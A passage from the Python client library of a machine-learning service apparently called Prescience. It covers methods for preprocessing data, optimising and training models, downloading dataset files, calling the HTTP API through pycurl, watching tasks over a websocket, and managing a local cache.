datetime_exogenous: list = None,
granularity: str = None
):
"""
Launch a Preprocess Task from a Source for creating a Dataset
:param source_id: The initial Source ID
:param dataset_id: The id that we want for the Dataset
:param label_id: The name of the Source column that we want to predict (the label)
:param problem_type: The type of machine learning problem that we want to solve
:param log_enabled: Preprocess numeric variable with log10
:param selected_column: subset of the source column to use for preprocessing, by default it will use all
:param time_column: Indicates the time column (or step column) for a time-series problem type
:param nb_fold: The number of fold to create during the preprocessing of the source
:param fold_size: The number of fold to use on cross-validation
:param fold_strategy: For time series the way to split data in different fold
:param test_ratio: The size of test ratio
:param formatter: (For TS only) The string formatter that prescience should use for parsing date column (ex: yyyy-MM-dd)
:param datetime_exogenous: (For TS only) The augmented features related to date to computing during preprocessing
:param granularity: (For TS only) The granularity to use for the date
:return: The task object of the Preprocess Task
"""
body = {
'dataset_id': dataset_id,
'label_id': label_id,
'problem_type': str(problem_type),
'log_enabled': log_enabled
}
if selected_column is not None:
body['selected_columns'] = selected_column
if time_column is not None:
body['time_column_id'] = time_column
if fold_size is not None and fold_size >= 0:
body['fold_size'] = fold_size
if fold_strategy is not None:
body['fold_strategy'] = str(fold_strategy)
if nb_fold is not None and nb_fold >= 0:
body['nb_fold'] = nb_fold
if test_ratio is not None and test_ratio > 0:
body['test_ratio'] = test_ratio
date_time_info = {}
if formatter is not None:
date_time_info['format'] = formatter
if datetime_exogenous is not None:
date_time_info['exogenous'] = datetime_exogenous
if granularity is not None:
date_time_info['granularity'] = granularity
if len(date_time_info) != 0:
body['datetime_info'] = date_time_info
_, result, _ = self.__post(path=f'/ml/preprocess/{source_id}', data=body)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def optimize(self,
dataset_id: str,
scoring_metric: ScoringMetric,
budget: int = None,
optimization_method: str = None,
custom_parameter: dict = None,
forecasting_horizon_steps: int = None,
forecast_discount: float = None
) -> 'Task':
"""
Launch an optimize task from a dataset object
:param dataset_id: The Id of the initial dataset
:param scoring_metric: The scoring metric that we want to optimize on
:param budget: The budget to consume before stopping the optimization
:param forecasting_horizon_steps: Number of steps forward to take into account as a forecast horizon for the optimization
:return: The task object of the Optimize Task
"""
optimize_input = {
'scoring_metric': str(scoring_metric),
'budget': budget,
'optimization_method': optimization_method,
'custom_parameters': custom_parameter,
'forecasting_horizon_steps': forecasting_horizon_steps,
'forecasting_discount': forecast_discount
}
data = {k: v for k, v in optimize_input.items() if v is not None} # Delete None value in dict
_, result, _ = self.__post(
path=f'/ml/optimize/{dataset_id}',
data=data
)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def custom_config(self,
dataset_id: str,
config: Config
) -> 'Task':
"""
Launch the evaluation of a single custom configuration from a dataset
:param dataset_id: The initial dataset ID
:param config: The custom configuration that we want to evaluate
:return: The evaluation task
"""
_, result, _ = self.__post(path=f'/ml/custom-config/{dataset_id}', data=config.json_dict)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def train(self,
evaluation_uuid: str,
model_id: str,
compute_shap_summary: bool = False,
chain_metric_task: bool = True,
dataset_id: str = None
) -> 'TrainTask':
"""
Launch a train task from an evaluation result for creating a model
:param evaluation_uuid: The initial evaluation result uuid
:param model_id: The id that we want for the model
:param compute_shap_summary: should chain the train task with a compute shap summary task ? (default: false)
:param chain_metric_task: should chain the train task with a metric task ? (default: true)
:param dataset_id: dataset to use for the train (default: None, dataset parent of the evaluation)
:return: The Train Task object
"""
query_parameters = {
'model_id': model_id,
'evaluation_uuid': evaluation_uuid,
'enable_shap_summary': compute_shap_summary,
'chain_metric_task': chain_metric_task,
'dataset_id': dataset_id
}
_, result, _ = self.__post(path=f'/ml/train', query_parameters=query_parameters)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def retrain(self,
model_id: str,
filepath: str = None,
chain_metric_task: bool = True,
enable_shap_summary: bool = None,
last_point_date: datetime = None,
sample_span: str = None
) -> 'TrainTask':
"""
Launch a Re-Train task on a model
:param model_id: The initial model ID
:param filepath: The path of the local input file/directory
:param chain_metric_task: should chain the train task with a metric task ? (default: True)
:return:
"""
query_parameters = {
'chain_metric_task': chain_metric_task,
'enable_shap_summary': enable_shap_summary
}
if last_point_date:
query_parameters['last_point_timestamp'] = int(last_point_date.timestamp() * 1e6)
if sample_span:
query_parameters['sample_span'] = sample_span
if filepath:
if os.path.isdir(filepath):
multipart = [
(
'input-file',
(pycurl.FORM_FILE, os.path.join(filepath, filename))
) for filename in os.listdir(filepath)
]
else:
multipart = [
('input-file', (pycurl.FORM_FILE, filepath))
]
else:
multipart = None
_, result, _ = self.__post(path=f'/ml/retrain/{model_id}', query_parameters=query_parameters,
multipart=multipart)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def interrupt(self,
task_id: str):
"""
Interrupt a task on prescience
:param task_id: The task ID to interrupt
"""
_, _, _ = self.__post(path=f'/task/{task_id}/interrupt')
def create_mask(self,
dataset_id: str,
mask_id: str,
selected_column: list) -> 'Dataset':
"""
Create a Mask Dataset from a Dataset
:param dataset_id: The initial Dataset ID
:param mask_id: The new ID that we want to create for the Mask Dataset
:param selected_column: The subset of the initial Dataset that we want to keep for the Mask Dataset
:return: The new Mask Dataset
"""
query_parameters = {'mask_id': mask_id}
_, result, _ = self.__post(path=f'/dataset/mask/{dataset_id}', data=selected_column,
query_parameters=query_parameters)
from prescience_client.bean.dataset import Dataset
return Dataset(json=result, prescience=self)
def refresh_dataset(self,
dataset_id: str,
filepath: str = None) -> 'Task':
"""
Launch a refresh task on a dataset
:param dataset_id: The ID of the dataset we want to launch a refresh on
:param filepath: The path of the local input file/directory
:param filepath: The path of the local input file/directory
:return: The refresh task object
"""
if filepath:
if os.path.isdir(filepath):
multipart = [
(
'input-file',
(pycurl.FORM_FILE, os.path.join(filepath, filename))
) for filename in os.listdir(filepath)
]
else:
multipart = [
('input-file', (pycurl.FORM_FILE, filepath))
]
else:
multipart = None
_, result, _ = self.__post(path=f'/ml/refresh/{dataset_id}', multipart=multipart)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self)
def get_project(self):
"""
Get the current prescience project we are working on
:return: the current prescience project we are working on
"""
_, project, _ = self.__get(path='/project')
return Project(project)
def tasks(self, page: int = 1, status: str = None):
"""
Get the paginated list of prescience tasks for the current project
:param page: The number of the page to get
:param status: Filter the status of the tasks
:return: the page object containing prescience tasks
"""
query_parameters = {'page': page}
if status:
query_parameters.update({'status': status})
_, page, _ = self.__get(path='/task', query_parameters=query_parameters)
from prescience_client.bean.task import Task
from prescience_client.bean.task import TaskFactory
from prescience_client.bean.page_result import PageResult
return PageResult(json_dict=page, clazz=Task, factory_method=TaskFactory.construct, prescience=self)
def task(self, task_uuid: str) -> 'Task':
_, result, _ = self.__get(path=f'/task/{task_uuid}')
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(task_dict=result, prescience=self)
def sources(self, page: int = 1):
"""
Get the paginated list of created prescience sources for the current project
:param page: The number of the page to get
:return: the page object containing prescience sources
"""
query_parameters = {'page': page}
_, page, _ = self.__get(path='/source', query_parameters=query_parameters)
from prescience_client.bean.source import Source
from prescience_client.bean.page_result import PageResult
return PageResult(page, Source, prescience=self)
def source(self, source_id: str):
"""
Get a single source from its ID
:param source_id: The source ID
:return: The source object
"""
from prescience_client.bean.source import Source
_, source, _ = self.__get(path=f'/source/{source_id}')
return Source(json_dict=source, prescience=self)
def datasets(self, page: int = 1, source_id_filter: str = None):
"""
Get the paginated list of prescience datasets for the current project
:param page: The number of the page to get
:param source_id_filter: The filter to use on source ID (default: None)
:return: the page object containing prescience datasets
"""
query_parameters = {'page': page}
if source_id_filter is not None:
query_parameters['source_id'] = source_id_filter
_, page, _ = self.__get(path='/dataset', query_parameters=query_parameters)
from prescience_client.bean.page_result import PageResult
from prescience_client.bean.dataset import Dataset
return PageResult(page, Dataset, prescience=self)
def dataset(self, dataset_id: str):
"""
Get a single dataset from its ID
:param dataset_id: The dataset ID
:return: The dataset object
"""
_, source, _ = self.__get(path=f'/dataset/{dataset_id}')
from prescience_client.bean.dataset import Dataset
return Dataset(json=source, prescience=self)
def get_evaluation_results(self,
dataset_id: str,
page: int = 1,
size: int = 100,
sort_column: str = None,
sort_direction: SortDirection = SortDirection.ASC,
forecasting_horizon_steps: int = None,
forecasting_discount: float = None,
status: Status = None ) -> 'PageResult':
"""
Get the paginated list of evaluation results
:param dataset_id: The dataset ID
:param page: The number of the page to get
:param size: The number of evaluations result to get (min 1)
:param sort_column: The column to sort on
:param sort_direction: The direction to sort on
:param forecasting_horizon_steps: The horizon step to filter on (default: None)
:param forecasting_discount: The forecasting discount to filter on (default: None)
:param status: The optimization status to filter on
:return: the page object containing the evaluation results
"""
query_parameters = {
'dataset_id': dataset_id,
'page': page,
'size': size,
'sort_column': sort_column,
'forecasting_horizon_steps': forecasting_horizon_steps,
'forecasting_discount': forecasting_discount,
'sort_direction': str(sort_direction)
}
if status:
query_parameters['status']: str(status)
final_query_parameters = {k: v for k, v in query_parameters.items() if v is not None}
_, page, _ = self.__get(path='/evaluation-result', query_parameters=final_query_parameters)
from prescience_client.bean.page_result import PageResult
from prescience_client.bean.evaluation_result import EvaluationResult
return PageResult(page, EvaluationResult, prescience=self)
def models(self, page: int = 1, dataset_id_filter: str = None):
"""
Get the paginated list of models
:param page: The number of the page to get
:param dataset_id_filter: The filter to use on dataset ID (default: None)
:return: the page object containing the models
"""
query_parameters = {'page': page}
if dataset_id_filter is not None:
query_parameters['dataset_id'] = dataset_id_filter
_, page, _ = self.__get(path='/model', query_parameters=query_parameters)
from prescience_client.bean.page_result import PageResult
from prescience_client.bean.model import Model
return PageResult(page, Model, prescience=self)
def model(self, model_id: str):
"""
Get a single model from its ID
:param model_id: The model ID
:return: The model object
"""
_, model, _ = self.__get(path=f'/model/{model_id}')
from prescience_client.bean.model import Model
return Model(json=model, prescience=self)
def model_metric(self, model_id: str) -> 'ModelMetric':
"""
Get the model metric of a wanted model
:param model_id: The model ID
:return: The model metric object
"""
model = self.model(model_id)
_, metric, _ = self.__get(path=f'/model/{model_id}/additional-information/metrics')
from prescience_client.bean.model_metric import get_model_metric
return get_model_metric(metric, model)
def model_metric_from_csv(self,
model_id: str,
filepath: str
) -> 'Task':
"""
Upload a local input file on prescience and launch a Parse Task on it for creating a source.
:param model_id: The id of the model to evaluate
:param filepath: The path of the local input file
:return: The model metric object
"""
_, metric, _ = self.__post(
path=f'/metrics/{model_id}/transform-model',
filepath=filepath,
call_type=PrescienceWebService.SERVING)
from prescience_client.bean.model_metric import ModelMetric
return ModelMetric(json=metric, prescience=self)
def model_test_evaluation(self, model_id: str) -> 'TestEvaluations':
"""
Get the test evaluation of a wanted model
:param model_id: The model ID
:return: The test evaluation object
"""
_, test_evaluation_dict, _ = self.__get(path=f'/model/{model_id}/additional-information/test_evaluations')
from prescience_client.bean.test_evaluation import TestEvaluations
return TestEvaluations(json=test_evaluation_dict, prescience=self)
def get_list_source_files(self, source_id: str) -> list:
"""
Get the list of all files of a given source data
:param source_id: The wanted source id
:return: the list of all files of a given source data
"""
_, response, _ = self.__get(path=f'/download/source/{source_id}')
return response
def get_list_dataset_train_files(self, dataset_id: str) -> list:
"""
Get the list of all files of a given dataset train data
:param dataset_id: The wanted dataset id
:return: the list of all files of a given dataset train data
"""
_, response, _ = self.__get(path=f'/download/dataset/{dataset_id}/train')
return response
def get_list_dataset_test_files(self, dataset_id: str) -> list:
"""
Get the list of all files of a given dataset test data
:param dataset_id: The wanted dataset id
:return: the list of all files of a given dataset test data
"""
_, response, _ = self.__get(path=f'/download/dataset/{dataset_id}/test')
return response
def get_list_dataset_fold_train_files(self, dataset_id: str, fold_number: int) -> list:
"""
Get the list of all files of a given dataset test data
:param dataset_id: The wanted dataset id
:param fold_number: Number of the fold
:return: the list of all files of a given dataset test data
"""
_, response, _ = self.__get(path=f'/download/dataset/{dataset_id}/fold/{fold_number}/train')
return response
def get_list_dataset_fold_test_files(self, dataset_id: str, fold_number: int) -> list:
"""
Get the list of all files of a given dataset test data
:param dataset_id: The wanted dataset id
:param fold_number: Number of the fold
:return: the list of all files of a given dataset test data
"""
_, response, _ = self.__get(path=f'/download/dataset/{dataset_id}/fold/{fold_number}/test')
return response
def download_source(self, source_id: str, output_directory: str):
"""
Download all source related files into the given directory
:param source_id: The source id to download
:param output_directory: The output directory (will be created if it doesn't exist)
"""
source_files = self.get_list_source_files(source_id=source_id)
if not os.path.exists(output_directory):
os.makedirs(output_directory)
for output in source_files:
_, file, _ = self.__get(path=f'/download/source/{source_id}/{output}', accept='application/octet-stream')
full_output_path = os.path.join(output_directory, output)
with open(full_output_path, 'wb') as stream:
stream.write(file)
stream.close()
def download_dataset(self, dataset_id: str, output_directory: str, test_part: bool):
"""
Download all dataset related files into the given directory
:param dataset_id: The dataset id to download
:param output_directory: The output directory (will be created if it doesn't exist)
:param test_part: Download only the dataset 'test' part and not the default 'train' part
"""
if not os.path.exists(output_directory):
os.makedirs(output_directory)
# Download train files
if test_part:
all_files = self.get_list_dataset_test_files(dataset_id=dataset_id)
path_part = 'test'
else:
all_files = self.get_list_dataset_train_files(dataset_id=dataset_id)
path_part = 'train'
for output in all_files:
_, file, _ = self.__get(path=f'/download/dataset/{dataset_id}/{path_part}/{output}',
accept='application/octet-stream')
full_output_path = os.path.join(output_directory, output)
with open(full_output_path, 'wb') as stream:
stream.write(file)
stream.close()
def download_fold(self, dataset_id: str, fold_number: int, output_directory: str, test_part: bool):
"""
Download all fold related files into the given directory
:param dataset_id: The dataset id of the wanted fold
:param fold_number: The number of the fold t download
:param output_directory: The output directory (will be created if it doesn't exist)
:param test_part: Download only the dataset 'test' part and not the default 'train' part
"""
if not os.path.exists(output_directory):
os.makedirs(output_directory)
# Download train files
if test_part:
all_files = self.get_list_dataset_fold_test_files(dataset_id=dataset_id, fold_number=fold_number)
path_part = 'test'
else:
all_files = self.get_list_dataset_fold_train_files(dataset_id=dataset_id, fold_number=fold_number)
path_part = 'train'
for output in all_files:
_, file, _ = self.__get(path=f'/download/dataset/{dataset_id}/fold/{fold_number}/{path_part}/{output}',
accept='application/octet-stream')
full_output_path = os.path.join(output_directory, output)
with open(full_output_path, 'wb') as stream:
stream.write(file)
stream.close()
def __get(self, path: str, query_parameters: dict = None, accept: str = 'application/json'):
"""
Generic HTTP GET call
:param path: the http path to call
:param query_parameters: The dict of query parameters, None if any
:param accept: accept header
:return: The tuple3 : (http response code, response content, cookie token)
"""
return self.call(method='GET', path=path, query_parameters=query_parameters, accept=accept)
def __post(self,
path: str,
data=None,
multipart: list = None,
query_parameters: dict = None,
call_type: PrescienceWebService = PrescienceWebService.API,
filepath: str = None):
"""
Generic HTTP POST call
:param path: the http path to call
:param data: The body json data to send (as dict). None if any
:param multipart: The list of multipart part to send. None of any
:param query_parameters: The dict of query parameters, None if any
:param call_type: The prescience web service called
:param filepath: path ot data file
:return: The tuple3 : (http response code, response content, cookie token)
"""
if filepath is not None:
content_type = 'application/octet-stream'
else:
content_type = 'application/json'
if multipart is not None:
content_type = 'multipart/form-data'
return self.call(
method='POST',
path=path,
data=data,
multipart=multipart,
content_type=content_type,
query_parameters=query_parameters,
call_type=call_type,
filepath=filepath
)
def __delete(self, path: str):
"""
Generic HTTP DELETE call
:param path: The http path to call
"""
return self.call(
method='DELETE',
path=path,
accept=''
)
@staticmethod
def progress_curl():
bar = None
def progress(download_t, download_d, upload_t, upload_d): # pylint: disable=unused-argument
nonlocal bar
if upload_t > 0 and not bar:
bar = IncrementalBar('Uploading', max=upload_t)
bar.suffix = '%(percent).1f%%'
if bar:
bar.next(upload_d - bar.index)
return progress
def call(
self,
method: str,
path: str,
query_parameters: dict = None,
data: dict = None,
multipart: list = None,
content_type: str = 'application/json',
call_type: PrescienceWebService = PrescienceWebService.API,
accept: str = 'application/json',
filepath: str = None
):
"""
Generic HTTP call wrapper for pyCurl
:param method: The HTTP method to call
:param path: The path to call
:param query_parameters: The dict of query parameters, None if any
:param data: The body json data to send (as dict). None if any
:param multipart: The list of multipart part to send. None of any
:param content_type: The content type header to use (default: application/json)
:param timeout_seconds: The timeout of the http request
:param call_type: The prescience web service called
:param accept: accept header
:return: The tuple3 : (http response code, response content, cookie token)
"""
if self.config().is_verbose_activated():
print(data)
switch = {
PrescienceWebService.API: f'{self.prescience_config.get_current_api_url()}{path}',
PrescienceWebService.ADMIN_API: f'{self.prescience_config.get_current_admin_api_url()}{path}',
PrescienceWebService.SERVING: f'{self.prescience_config.get_current_serving_url()}{path}',
PrescienceWebService.CONFIG: f'{self.prescience_config.get_current_config_url()}{path}'
}
complete_url = switch.get(call_type)
if query_parameters is not None and len(query_parameters) != 0:
# remove None Parameter
query_parameters = {k: query_parameters[k] for k in query_parameters.keys() if query_parameters[k]}
encoded_parameter = urllib.parse.urlencode(query_parameters)
complete_url = f'{complete_url}?{encoded_parameter}'
buffer = BytesIO()
http_headers = [
f'Authorization: Bearer {self.prescience_config.get_current_token()}',
f'Content-Type: {content_type}',
f'User-Agent: OVH-Prescience-Python-Client'
]
if accept != '':
http_headers.append(f'accept: {accept}')
curl = pycurl.Curl()
curl.setopt(pycurl.TIMEOUT, self.config().get_timeout())
curl.setopt(pycurl.URL, complete_url)
curl.setopt(pycurl.HTTPHEADER, http_headers)
curl.setopt(pycurl.CUSTOMREQUEST, method)
curl.setopt(pycurl.NOPROGRESS, False)
curl.setopt(pycurl.XFERINFOFUNCTION, self.progress_curl())
if self.config().is_verbose_activated():
curl.setopt(pycurl.VERBOSE, 1)
file = None
if filepath is not None:
file = open(filepath, 'rb')
curl.setopt(pycurl.POST, 1)
curl.setopt(pycurl.POSTFIELDSIZE, os.stat(filepath).st_size)
curl.setopt(pycurl.READDATA, file)
if data is not None:
curl.setopt(pycurl.POSTFIELDS, json.dumps(data))
if multipart is not None:
curl.setopt(pycurl.HTTPPOST, multipart)
curl.setopt(pycurl.WRITEDATA, buffer)
# Catch token cookie if any
cookie_token = []
# closure to capture Set-Cookie
def _catch_cookie_token(header):
match = re.match("^Set-Cookie: .*token=(.+?);.*$", header.decode("utf-8"))
if match:
cookie_token.append(('token', match.group(1)))
# use closure to collect cookies sent from the server
curl.setopt(pycurl.HEADERFUNCTION, _catch_cookie_token)
try:
curl.perform()
except pycurl.error as error:
prescience_error = PyCurlExceptionFactory.construct(error)
self.config().handle_exception(prescience_error)
finally:
if file is not None:
file.close()
status_code = curl.getinfo(pycurl.RESPONSE_CODE)
response_content = buffer.getvalue()
if accept != 'application/octet-stream':
response_content = response_content.decode('UTF-8')
curl.close()
if status_code // 100 != 2:
prescience_error = HttpErrorExceptionFactory.construct(status_code, response_content)
self.config().handle_exception(prescience_error)
else:
if accept == 'application/json':
json_response = json.loads(response_content)
if self.config().is_verbose_activated():
print(f'[{status_code}] {json_response}')
return status_code, json_response, dict(cookie_token)
else:
return status_code, response_content, dict(cookie_token)
############################################
############### SERVING METHODS ############
############################################
def serving_model_evaluator(self, model_id: str):
"""
Access the evaluator of a model on prescience-serving api
:param model_id: The id of the model
:return: The answered json dictionary for the evaluator
"""
_, result, _ = self.call(
method='GET',
path=f'/evaluator/{model_id}',
call_type=PrescienceWebService.SERVING
)
return result
def serving_model_evaluate(self,
model_id: str,
flow_type: FlowType,
request_data):
"""
Evaluate a model from a single request
:param model_id: The id of the model to evaluate
:param flow_type: The flow type of the evaluation
:param request_data: The json dictionary or list of dictionary containing evaluation parameters
:return: The json dictionary of the answer
"""
path = f'/eval/{model_id}/{str(flow_type)}'
if isinstance(request_data, list):
path = f'/eval/{model_id}/{str(flow_type)}/batch/json'
_, result, _ = self.call(
method='POST',
path=path,
call_type=PrescienceWebService.SERVING,
data=request_data
)
return result
def get_available_configurations(self, kind: AlgorithmConfigurationCategory) -> 'AlgorithmConfigurationList':
path = f'/{str(kind)}'
_, result, _ = self.call(
method='GET',
path=path,
call_type=PrescienceWebService.CONFIG
)
from prescience_client.bean.algorithm_configuration import AlgorithmConfigurationList
return AlgorithmConfigurationList(json_dict=result, category=kind)
def start_auto_ml(
self,
source_id,
label_id: str,
problem_type: ProblemType,
scoring_metric: ScoringMetric,
log_enabled: bool = False,
dataset_id: str = None,
model_id: str = None,
time_column: str = None,
nb_fold: int = None,
fold_strategy: FoldStrategy = None,
selected_column: list = None,
budget: int = None,
forecasting_horizon_steps: int = None,
forecast_discount: float = None,
formatter: str = None,
datetime_exogenous: list = None,
granularity: str = None
) -> ('Task', str, str):
"""
Start an auto-ml task
:param source_id: The ID of the initial source object
:param label_id: ID of the label to predict
:param problem_type: The type of the problem
:param scoring_metric: The scoring metric to optimize on
:param log_enabled: Preprocess numeric variable with log10
:param dataset_id: The wanted dataset_id (will generate one if unset)
:param model_id: The wanted model_id (will generate one if unset)
:param time_column: The ID of the time column (Only in case of a time_series_forecast)
:param nb_fold: The number of fold to create during the preprocessing of the source
:param fold_strategy: For time series the way to split data in different fold
:param selected_column: The column to keep (will keep everything if unset)
:param budget: The budget to use during optimization
:param forecasting_horizon_steps: The wanted forecasting horizon (in case of a time_series_forecast)
:param forecast_discount: The wanted forecasting discount
:param formatter: (For TS only) The string formatter that prescience should use for parsing date column (ex: yyyy-MM-dd)
:param datetime_exogenous: (For TS only) The augmented features related to date to computing during preprocessing
:param granularity: (For TS only) The granularity to use for the date
:return: The tuple3 of (initial task, dataset id, model id)
"""
if dataset_id is None:
dataset_id = f'{source_id}_dataset_{self._get_unique_id()}'
if model_id is None:
model_id = f'{source_id}_model_{self._get_unique_id()}'
body = {
'dataset_id': dataset_id,
'label_id': label_id,
'model_id': model_id,
'problem_type': str(problem_type),
'scoring_metric': str(scoring_metric),
'custom_parameters': {},
'optimization_method': 'SMAC',
'multiclass': False,
'log_enabled': log_enabled
}
if time_column is not None:
body['time_column_id'] = time_column
if nb_fold is not None and nb_fold > 1:
body['nb_fold'] = nb_fold
if fold_strategy is not None:
body['fold_strategy'] = str(fold_strategy)
if selected_column is not None and len(selected_column) >= 0:
body['selected_column'] = selected_column
if budget is not None and budget >= 0:
body['budget'] = budget
if forecasting_horizon_steps is not None and forecasting_horizon_steps >= 0:
body['forecasting_horizon_steps'] = forecasting_horizon_steps
if forecast_discount is not None:
body['forecasting_discount'] = forecast_discount
date_time_info = {}
if formatter is not None:
date_time_info['format'] = formatter
if datetime_exogenous is not None:
date_time_info['exogenous'] = [str(x) for x in datetime_exogenous]
if granularity is not None:
date_time_info['granularity'] = str(granularity)
if len(date_time_info) != 0:
body['datetime_info'] = date_time_info
print('Starting AutoML task with following arguments :')
print(json.dumps(body, indent=4))
_, result, _ = self.__post(path=f'/ml/auto-ml/{source_id}', data=body)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self), dataset_id, model_id
def start_auto_ml_warp10(
self,
warp_input: Warp10TimeSerieInput,
scheduler_output: Warp10Scheduler,
scoring_metric: ScoringMetric,
dataset_id: str = None,
model_id: str = None,
log_enabled: bool = False,
nb_fold: int = None,
fold_strategy: FoldStrategy = None,
budget: int = None,
forecasting_horizon_steps: int = None,
forecast_discount: float = None,
datetime_exogenous: list = None,
granularity: str = None
) -> ('Task', str, str):
"""
Start an auto-ml-warp task
:param warp_input: The Warp10 TimeSerie Input
:param scheduler_output: The Scheduler Output
:param scoring_metric: The scoring metric to optimize on
:param dataset_id: The wanted dataset_id (will generate one if unset)
:param model_id: The wanted model_id (will generate one if unset)
:param log_enabled: Preprocess numeric variable with log10
:param nb_fold: The number of fold to create during the preprocessing of the source
:param fold_strategy: For time series the way to split data in different fold
:param budget: The budget to use during optimization
:param forecasting_horizon_steps: The wanted forecasting horizon (in case of a time_series_forecast)
:param forecast_discount: The wanted forecasting discount
:param datetime_exogenous: (For TS only) The augmented features related to date to computing during preprocessing
:param granularity: (For TS only) The granularity to use for the date
:return: The tuple3 of (initial task, dataset id, model id)
"""
if dataset_id is None:
dataset_id = f'{warp_input.source_id}_dataset_{self._get_unique_id()}'
if model_id is None:
model_id = f'{warp_input.source_id}_model_{self._get_unique_id()}'
body = {
'dataset_id': dataset_id,
'model_id': model_id,
'scoring_metric': str(scoring_metric),
'log_enabled': log_enabled
}
if nb_fold and nb_fold > 1:
body['nb_fold'] = nb_fold
if fold_strategy is not None:
body['fold_strategy'] = str(fold_strategy)
if budget and budget >= 0:
body['budget'] = budget
if forecasting_horizon_steps and forecasting_horizon_steps >= 0:
body['forecasting_horizon_steps'] = forecasting_horizon_steps
if forecast_discount:
body['forecasting_discount'] = forecast_discount
date_time_info = {'format': 'TS_N'}
if datetime_exogenous is not None:
date_time_info['exogenous'] = [str(x) for x in datetime_exogenous]
if granularity is not None:
date_time_info['granularity'] = str(granularity)
if len(date_time_info) > 1:
body['datetime_info'] = date_time_info
body.update(warp_input.to_dict())
if scheduler_output:
scheduler_output.output_value.labels["model"] = model_id
body.update(scheduler_output.to_dict())
print('Starting AutoML Warp 10 task with following arguments :')
print(json.dumps(body, indent=4))
_, result, _ = self.__post(path=f'/ml/auto-ml-ts', data=body)
from prescience_client.bean.task import TaskFactory
return TaskFactory.construct(result, self), dataset_id, model_id
############################################
########### WEB-SOCKET METHODS #############
############################################
def __init_ws_connection(self):
"""
Initialize the web-socket connection :
- Log into prescience with the configured Bearer token for getting the cookie token
- Create the web-socket connection with the previous cookie token
:return: The web-socket connection
"""
token = self.login()
ws = create_connection(self.prescience_config.get_current_websocket_url(), cookie=f'token={token}')
ws.send('')
return ws
# Wait for the next message related to the given task
def __wait_for_task_message(self, ws, task: 'Task'):
"""
Wait until the next related task
:param ws: The web socket connection
:param task: the task to watch
:return: The related task catch from WS connection
"""
task_message = None
while task_message is None or task_message.uuid() != task.uuid() or task_message.type() != task.type():
rcv_message = ws.recv()
message = json.loads(rcv_message)['entity']
from prescience_client.bean.task import TaskFactory
task_message = TaskFactory.construct(message, self)
return task_message
def wait_for_task_done_or_error(self, initial_task: 'Task') -> 'Task':
"""
Wait until the given task is DONE or ERROR
:param initial_task:
:return: The last state of the Task
"""
bar = ChargingBar(initial_task.type(), max=initial_task.total_step())
if initial_task.current_step_description() is not None:
bar.message = f'{initial_task.type()}'
bar.next(0)
final_task = self.retry_wait_for_finish(bar, initial_task, True)
bar.message = f'{final_task.type()} - {final_task.status().to_colored()}'
if final_task.status() == Status.DONE:
# Complete the progression in case we missed some messages
bar.next(bar.remaining)
bar.finish()
return final_task
def retry_wait_for_finish(self, bar, initial_task, retry):
# Initialize web-socket connection
websocket = self.__init_ws_connection()
result_queue = Queue()
exec_process = Process(target=self.wait_for_finish, args=(websocket, bar, initial_task, result_queue))
exec_process.start()
final_task = self.task(initial_task.uuid())
if final_task.status() in [Status.DONE, Status.ERROR]:
# in this case the task was finished potentially before the websocket was connected, we do not need to watch
exec_process.terminate()
else:
# in this case when we started to watch the websocket, the task was not over, we wait
ok, result_payload = result_queue.get()
exec_process.join()
if ok:
from prescience_client.bean.task import TaskFactory
final_task = TaskFactory.construct(result_payload, self)
elif retry:
# we failed to watch the task through the end, start again once
# Closing web-socket
websocket.close()
self.retry_wait_for_finish(bar, initial_task, False)
else:
final_task = initial_task
# Closing result queue
result_queue.close()
# Closing web-socket
websocket.close()
return final_task
def wait_for_finish(self, websocket, bar, task, queue: Queue):
current_task = task
try:
while current_task.status() != Status.DONE and current_task.status() != Status.ERROR:
current_task = self.__wait_for_task_message(websocket, current_task)
bar.next()
except WebSocketException:
# we occasionally experience unexpected websocket connection close
queue.put((False, None))
queue.put((True, current_task.initial_payload))
############################################
############### FACTORY METHODS ############
############################################
def csv_local_file_input(self, filepath: str, headers: bool = True) -> 'CsvLocalFileInput':
"""
Create a csv local input file
:param filepath: The path of your csv
:param headers: Does the csv file has header ? (default: True)
:return: The CsvLocalFileInput object
"""
from prescience_client.bean.entity.local_file_input import CsvLocalFileInput
return CsvLocalFileInput(filepath=filepath, headers=headers, prescience=self)
def parquet_local_file_input(self, filepath: str) -> 'CsvLocalFileInput':
"""
Create a parquet local input file
:param filepath: The path of your parquet
:return: The ParquetLocalFileInput object
"""
from prescience_client.bean.entity.local_file_input import ParquetLocalFileInput
return ParquetLocalFileInput(filepath=filepath, prescience=self)
############################################
#### LOCAL CACHE MANAGEMENT METHODS ########
############################################
def cache_source_get_full_path(self, source_id: str) -> str:
"""
Get the full path of the local cache for the given source
:param source_id: the wanted source id
:return: the full path of the local cache for the given source
"""
cache_source_directory = self.config().get_or_create_cache_sources_directory()
return os.path.join(cache_source_directory, source_id)
def cache_dataset_get_full_path(self, dataset_id: str, test_part: bool) -> str:
"""
Get the full path of the local cache for the given dataset
:param dataset_id: the wanted dataset id
:param test_part: cache only the test part of the dataset instead of the default train part
:return: the full path of the local cache for the given dataset
"""
cache_dataset_directory = self.config().get_or_create_cache_datasets_directory()
if test_part:
test_path = os.path.join(cache_dataset_directory, dataset_id, 'test')
return self.config().create_config_path_if_not_exist(test_path)
else:
train_path = os.path.join(cache_dataset_directory, dataset_id, 'train')
return self.config().create_config_path_if_not_exist(train_path)
def cache_dataset_fold_get_full_path(self, dataset_id: str, fold_number: int, test_part: bool) -> str:
"""
Get the full path of the local cache for the given fold
:param dataset_id: the wanted dataset id
:param fold_number: the fold number
:param test_part: cache only the test part of the dataset instead of the default train part
:return: the full path of the local cache for the given dataset
"""
cache_dataset_directory = self.config().get_or_create_cache_datasets_directory()
if test_part:
test_path = os.path.join(cache_dataset_directory, dataset_id, 'fold', str(fold_number), 'test')
return self.config().create_config_path_if_not_exist(test_path)
else:
train_path = os.path.join(cache_dataset_directory, dataset_id, 'fold', str(fold_number), 'train')
return self.config().create_config_path_if_not_exist(train_path)
def cache_clean_fold(self, dataset_id: str, fold_number: int, test_part: bool):
"""
Clean the local cache data of the given fold
:param dataset_id: the dataset id
:param fold_number: The number of the fold
